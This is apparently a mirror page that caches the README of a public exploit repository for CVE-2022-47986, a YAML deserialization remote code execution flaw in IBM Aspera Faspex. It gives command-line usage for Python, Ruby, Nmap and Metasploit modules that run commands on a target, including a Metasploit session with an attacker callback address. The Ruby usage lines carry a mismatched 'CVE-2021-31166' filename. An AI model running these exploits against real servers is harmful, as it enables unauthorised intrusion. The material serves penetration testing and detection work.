Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-47986 PoC — IBM Aspera Faspex 代码问题漏洞

Source
https://github.com/mauricelambert/CVE-2022-47986
Associated Vulnerability
Title:IBM Aspera Faspex 代码问题漏洞 (CVE-2022-47986)
Description:IBM Aspera是美国国际商业机器(IBM)公司的一套基于IBM FASP协议构建的快速文件传输和流解决方案。 IBM Aspera Faspex 4.4.2 Patch Level 1版本及之前版本存在代码问题漏洞,该漏洞源于YAML反序列化缺陷。攻击者利用该漏洞在系统上执行任意代码。
Description
CVE-2022-47986: Python, Ruby, NMAP and Metasploit modules to exploit the vulnerability.
Readme
# CVE-2022-47986

## Why

This vulnerability is exploited in the wild.
IceFire use this vulnerability to deploy the ransomware on targeted systems, i would like to help SOC/Blue teams to identify impacted systems and Pentesters/Red teams to exploit and report it.

## Description

I propose pure python and ruby scripts, metasploit and nmap modules to exploit the vulnerability that causes a RCE (Remote Code Execution) on IBM Aspera Faspex from YAML deserialization.

## Exploit: RCE (Remote Code Execution)

### Python

```bash
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id
```

### Ruby

```bash
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id
```

### Metasploit

```text
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization 
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit
```

### Nmap

```bash
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2
```

## Sources

 - [IBM](https://www.ibm.com/support/pages/node/6952319)
 - [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2022-47986)
 - [Blog - Exploit](https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/)
 - [thehackernews - exploited by icefire](https://thehackernews.com/2023/03/icefire-linux-ransomware.html)
 - [thehackernews - CISA KEV catalog](https://thehackernews.com/2023/02/us-cybersecurity-agency-cisa-adds-three.html)

## Licence

Licensed under the [GPL, version 3](https://www.gnu.org/licenses/).
File Snapshot

 [4.0K]  /data/pocs/8d781d2682735dfb87325cbce200404adb185868
├── [3.8K]  CVE-2022-47986.py
├── [4.7K]  CVE-2022-47986.rb
├── [5.5K]  ibm-aspera-faspex-rce.nse
├── [4.4K]  ibm_aspera_faspex_rce_yaml_deserialization.rb
├── [ 34K]  LICENSE
└── [1.9K]  README.md

0 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.